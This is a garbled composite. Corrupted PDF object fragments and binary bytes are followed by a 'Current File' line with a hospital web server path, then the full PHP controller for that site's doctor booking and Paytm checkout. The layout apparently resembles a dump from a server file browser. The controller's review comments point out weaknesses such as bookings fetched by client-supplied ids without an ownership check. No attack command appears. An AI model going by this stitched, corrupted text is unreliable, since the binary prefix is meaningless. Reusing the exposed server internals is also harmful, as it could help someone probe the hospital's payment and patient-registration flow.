%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

Current File : /var/www/html/shardahospital.org/drbooking/application/controllers/Payment.php
<?php
// Refuse direct execution outside the CodeIgniter bootstrap (index.php defines BASEPATH).
if (!defined('BASEPATH')) {
	exit('No direct script access allowed');
}
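class Payment extends CI_Controller {

	/*
	* Function : __construct
	* Loads the models every action needs and sends visitors without a session id back to the site root.
	* The session payload is used as an object throughout this controller, so the guard first makes sure
	* one exists; the original dereferenced ->id on whatever userdata() returned.
	*/
	public function __construct(){
		parent::__construct();
		$this->load->model(array('Home_Model','Common_Model'));
		$userData = $this->session->userdata('user_data');
		if(!is_object($userData) || $userData->id=='') {
			redirect('');
		}
	}

	/*
	* Function : index
	* Shows the confirmation page for the booking referenced by the last URI segment, registering the
	* patient with the HIS first when the booking has no his_id yet.
	* The segment is base64(JSON) whose project_id member is the booking primary key. It is client
	* controlled, so its shape is validated before it reaches the query; a missing or unknown booking is a 404.
	*/
	public function index()
	{
		$data = array();
		$header = array();
		$tbl_name = "tbl_booking_confirmation";

		$record_num = end($this->uri->segments);
		$slugArray = json_decode(base64_decode((string) $record_num));
		if (!is_object($slugArray) || !isset($slugArray->project_id)) {
			show_404();
		}

		$userData = $this->session->userdata('user_data');
		// '\n' in single quotes is the two characters backslash-n (kept as in the original); trim() removes real newlines.
		$orderId = str_replace('\n','',trim((string) $slugArray->project_id));
		$recordsDetails = $this->Common_Model->getSingleRecord($tbl_name, '*', array('status'=>'1', 'id'=>$orderId));
		if (empty($recordsDetails)) {
			show_404();
		}
		// NOTE(review): the booking is selected by id only; confirm that it is also tied to the session user,
		// otherwise any logged-in user can open another user's confirmation by forging the segment.
		$data['doctorDetails'] = $doctorDetails = $this->Common_Model->getSingleRecord('tbl_doctor_master','*',array('status'=>'1', 'dr_id'=>$recordsDetails->dr_id));

		if($recordsDetails->his_id=='') {
			$responseArray = $this->setPatientDetails($recordsDetails);
			// Example reply: stdClass(RegistrationNo => 15, assigningAuthority => 3, typeCode => MR,
			//                         status => stdClass(code => 9, message => 'Patient is already registered!'))
			// A failed or malformed HIS reply leaves his_id at 0 so nothing is written.
			$his_id = (is_object($responseArray) && isset($responseArray->RegistrationNo)) ? (int) $responseArray->RegistrationNo : 0;
			if($his_id>0) {
				// The fee is copied onto the booking as its payable amount; a missing doctor record stores null (as before).
				$fee = is_object($doctorDetails) ? $doctorDetails->doctorfee : null;
				$this->Common_Model->updateinfo($tbl_name,array('his_id'=>$his_id,'amount'=>$fee),'id', $recordsDetails->id);
			}
		}

		// Re-read so the view sees the his_id/amount written above.
		$data['recordsDetails'] = $this->Common_Model->getSingleRecord($tbl_name, '*', array('status'=>'1', 'id'=>$orderId));
		$data['userInfo'] = $userData;

		$this->load->view('_parts/header',$header);
		$this->load->view('confirmation',$data);
		$this->load->view('_parts/footer');
	}

	/*
	* Function : setPatientDetails
	* Registers the booking's patient with the HIS through the CreatePatient endpoint and returns the
	* decoded reply (an object on success, null when the reply is not valid JSON).
	* Protected so it is not routable: CodeIgniter exposes every public controller method as a URL.
	*/
	protected function setPatientDetails($data)
	{
		$dob = str_replace(array('-','/'),'-',$data->dob);

		// Gender code comes from the title master record; a missing record yields '' as before.
		$genderArray = $this->Common_Model->getSingleRecord('tbl_title_master', '*', array('status'=>'1', 'id'=>$data->title_id));
		$gender = (is_object($genderArray) && isset($genderArray->gender_code)) ? $genderArray->gender_code : '';

		// The original literal repeated the "NationalityId" key three times; PHP keeps the last value ("0")
		// at the position of the first key, which is reproduced here.
		// NOTE(review): confirm "0" (rather than $data->country_id) is what the HIS expects.
		$post = [
			"FacilityCode"=> FACILITY_ID,
			"SourcePatientId"=>"",
			"TitleId"=>$data->title_id,
			"firstName"=> $data->full_name,
			"middleName"=> '',
			"lastName"=> '',
			"dob"=>$dob,
			"gender"=>$gender,
			"Address1"=>$data->address,
			"Address2"=>'',
			"cityCode"=>$data->city_id,
			"stateCode"=>$data->state_id,
			"countryCode"=>$data->country_id,
			"mobilePhone"=>$data->mobile_number,
			"PinCode"=>'',
			"MaritalStatus"=>'',
			"appointmentId"=>$data->order_id,
			"NationalityId"=>"0",
			"LeadSourceId"=>"",
			"RegistrationSource"=>"0",
			"PAddress1"=>$data->address,
			"PAddress2"=>'',
			"PcityCode"=>$data->city_id,
			"PstateCode"=>$data->state_id,
			"PcountryCode"=>$data->country_id,
			"PPinCode"=>'',
			"EmailId"=>$data->login_email,
		];

		$response = postExistingRequest('CreatePatient',json_encode($post));
		return json_decode($response);
	}

	/*
	* Function : generate_random
	* Six-digit random component of the gateway customer id. Uses the CSPRNG (PHP >= 7.0);
	* rand() is seedable and predictable.
	*/
	public function generate_random(){
		return random_int(111111, 999999);
	}

	/*
	* Function : payonline
	* POST entry point of the checkout: looks the booking up by the posted order_id, stamps it with a fresh
	* customer id, holds the doctor's slot and hands the visitor over to Paytm. Never returns (exit()).
	* Only order_id and the merchant_param2/4 passthroughs are read from the client; the amount charged is
	* always the stored booking amount. The original only overrode 'amount' when the client sent a truthy one.
	*/
	public function payonline()
	{
		$post = $_POST;
		$tbl_name = "tbl_booking_confirmation";
		$booking_id = isset($post['order_id']) ? trim((string) $post['order_id']) : '';

		// Get booking details
		$booking = ($booking_id === '') ? null : $this->Common_Model->getSingleRecord($tbl_name, '*', array('status'=>'1', 'order_id'=>$booking_id));
		if (empty($booking)) {
			echo '<script>alert("Unable to submit your request. Kindly try again later.");</script>';
			exit();
		}
		// NOTE(review): order_id is client supplied and not tied to the session user here; confirm the
		// booking belongs to the logged-in user before it can be paid for (or re-held) by someone else.

		// First four digits of the epoch plus a random six-digit suffix, as in the original scheme.
		$customer_id = substr((string) time(),0,4).$this->generate_random();

		$post['billing_name'] = $booking->full_name;
		$post['billing_address'] = $booking->address;
		$post['billing_city'] = '';
		$post['billing_state']= '';
		$post['billing_zip']= '';
		$post['amount']= $booking->amount;
		$post['billing_country']= 'India';
		$post['tid']= time();
		$post['billing_tel']= $booking->mobile_number;
		$post['billing_email']= $booking->login_email;
		// merchant_param4 keeps the client's note plus its original merchant_param2 before that slot is overwritten.
		$clientParam2 = isset($post['merchant_param2']) ? $post['merchant_param2'] : '';
		$clientParam4 = isset($post['merchant_param4']) ? $post['merchant_param4'] : '';
		$post['merchant_param4'] = $clientParam4.' - '.$clientParam2;
		$post['merchant_param2'] = $booking->mobile_number;
		$post['merchant_param3'] = $booking->login_email;
		$post['merchant_param5'] = $booking->order_id;

		$success = $this->Home_Model->updateinfo('tbl_booking_confirmation',array('customer_id'=>$customer_id,'status'=>'1','modifiedon'=>date('Y-m-d H:i:s')),'order_id',$booking->order_id);

		if($success){
			$TXN_AMOUNT = $booking->amount;
			// Hold Dr Slots
			$this->holdDrslots($post);
			$this->goToPayTm($booking->order_id,$customer_id,$TXN_AMOUNT);
		} else{
			echo '<script>alert("Unable to submit your request. Kindly try again later.");</script>';
		}
		exit();
	}

	/*
	* Function : holdDrslots
	* Marks the booking's slot as held (status '2') in tbl_slot_transaction_master, inserting the row when
	* the order has none yet and otherwise updating it. Returns false when order_id is missing or the
	* booking cannot be found, true otherwise (the save result itself is not checked, as before).
	*/
	protected function holdDrslots($params)
	{
		if (!is_array($params) || empty($params['order_id'])) {
			return false;
		}
		$booking_id = $params['order_id'];
		$transTable = 'tbl_slot_transaction_master';
		$trnsData = $this->Common_Model->getSingleRecord($transTable, '*', array('status'=>'1', 'order_id'=>$booking_id));
		$bookingData = $this->Common_Model->getSingleRecord('tbl_booking_confirmation', '*', array('status'=>'1', 'order_id'=>$booking_id));
		if (empty($bookingData)) {
			return false;
		}

		$data = array(
			'slots'=>$bookingData->slot_id,
			'order_id'=>$bookingData->order_id,
			'user_id'=>$bookingData->customer_id,
			'dr_id'=>$bookingData->dr_id,
			'status'=>'2'
		);

		// Four-digit year, matching the 'modifiedon' format written by payonline(); the original used 'y'.
		if(empty($trnsData)) {
			$data['createdon'] = date('Y-m-d H:i:s');
			$this->Home_Model->saveinfo($transTable,$data);
		} else {
			// NOTE(review): the update path also goes through saveinfo() while payonline() uses updateinfo();
			// confirm saveinfo() performs an UPDATE when given a key/value pair.
			$data['modifiedon'] = date('Y-m-d H:i:s');
			$this->Home_Model->saveinfo($transTable,$data,'order_id', $booking_id);
		}

		return true;
	}

	/*
	* Function : Paytm Payment
	* Emits an auto-submitting form that posts the order to PAYTM_TXN_URL together with the CHECKSUMHASH
	* computed over the sorted parameters. Never returns (exit()).
	* Protected: as a public method it was routable, so a crafted URL could choose ORDER_ID, CUST_ID and
	* TXN_AMOUNT directly; payonline() is the only caller and derives all three from the stored booking.
	*/
	protected function goToPayTm($ORDER_ID, $CUST_ID, $TXN_AMOUNT)
	{
		header("Pragma: no-cache");
		header("Cache-Control: no-cache");
		header("Expires: 0");

		// Every parameter below is part of the checksum input, so fields added here are covered by the hash.
		$paramList = array();
		$paramList["MID"] = PAYTM_MERCHANT_MID;
		$paramList["ORDER_ID"] = $ORDER_ID;
		$paramList["CUST_ID"] = $CUST_ID;
		$paramList["INDUSTRY_TYPE_ID"] = PAYTM_INDUSTRY;
		$paramList["CHANNEL_ID"] = PAYTM_CHANNEL_ID;
		$paramList["TXN_AMOUNT"] = number_format((float)$TXN_AMOUNT, 2, '.', '');
		$paramList["WEBSITE"] = PAYTM_MERCHANT_WEBSITE;
		$paramList["CALLBACK_URL"] =  base_url()."booking/paymentconfirmation";

		$checkSum = $this->getChecksumFromArray($paramList,PAYTM_MERCHANT_KEY);

		// Attribute values are HTML-escaped: ORDER_ID and CUST_ID come from stored booking data, not constants.
		$fields = '';
		foreach($paramList as $name => $value) {
			$fields .= '<input type="hidden" name="' . htmlspecialchars((string) $name, ENT_QUOTES, 'UTF-8') . '" value="' . htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8') . '">';
		}
		$fields .= '<input type="hidden" name="CHECKSUMHASH" value="' . htmlspecialchars((string) $checkSum, ENT_QUOTES, 'UTF-8') . '">';

		echo "<html>
				<head>
				<title>Merchant Check Out Page</title>
				</head>
				<body>
				<center><h1>Please do not refresh this page...</h1></center>
				<form method='post' action='".htmlspecialchars((string) PAYTM_TXN_URL, ENT_QUOTES, 'UTF-8')."' name='f1'>
				<table border='1'>
				<tbody>" . $fields . "
				</tbody>
				</table>
				<script type='text/javascript'>
				document.f1.submit();
				</script>
				</body>
			</html>";
		exit();
	}

	/* Checksum Functions Starts*/

	/*
	* Function : getChecksumFromArray
	* Paytm legacy checksum: sha256(sorted "|"-joined values . "|" . salt) . salt, AES-128-CBC encrypted
	* under the merchant key. $sort=0 keeps the caller's parameter order.
	*/
	private function getChecksumFromArray($arrayList, $key, $sort=1)
	{
		if ($sort != 0) {
			ksort($arrayList);
		}
		$str = $this->getArray2Str($arrayList);
		$salt = $this->generateSalt_e(4);
		$finalString = $str . "|" . $salt;
		$hash = hash("sha256", $finalString);
		$hashString = $hash . $salt;
		return $this->encrypt_e($hashString, $key);
	}

	/*
	* Function : getArray2Str
	* Joins the parameter values with "|", skipping any value that contains "REFUND" or "|" (both would
	* corrupt the checksum input). Values are cast to string first: strpos() on a non-string is a TypeError on PHP 8.
	* Private (was implicitly public) so the checksum helpers are not routable.
	*/
	private function getArray2Str($arrayList)
	{
		$findme   = 'REFUND';
		$findmepipe = '|';
		$parts = array();
		foreach ($arrayList as $key => $value) {
			$value = (string) $value;
			if (strpos($value, $findme) !== false || strpos($value, $findmepipe) !== false) {
				continue;
			}
			$parts[] = $this->checkString_e($value);
		}
		return implode("|", $parts);
	}

	/*
	* Function : checkString_e
	* Maps the literal string 'null' to ''. Strict comparison: with == an integer 0 also matched 'null' on PHP 7.
	*/
	private function checkString_e($value)
	{
		if ((string) $value === 'null') {
			$value = '';
		}
		return $value;
	}

	/*
	* Function : generateSalt_e
	* Random salt of $length characters drawn from the fixed Paytm alphabet, using the CSPRNG; the original
	* seeded rand() from microtime(), which made the salt guessable.
	*/
	private function generateSalt_e($length)
	{
		$data = "AbcDE123IJKLMN67QRSTUVWXYZ";
		$data .= "aBCdefghijklmn123opq45rs67tuv89wxyz";
		$data .= "0FGH45OP89";
		$last = strlen($data) - 1;

		$random = "";
		for ($i = 0; $i < (int) $length; $i++) {
			$random .= $data[random_int(0, $last)];
		}

		return $random;
	}

	/*
	* Function : encrypt_e
	* AES-128-CBC of $input under the (entity-decoded) merchant key, base64 output.
	* The fixed IV is part of the Paytm checksum specification and must match the gateway's verifier;
	* this routine must not be reused for any other encryption purpose.
	*/
	private function encrypt_e($input, $ky)
	{
		$key   = html_entity_decode($ky);
		$iv = "@@@@&&&&####$$$$";
		return openssl_encrypt ( $input , "AES-128-CBC" , $key, 0, $iv );
	}
}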
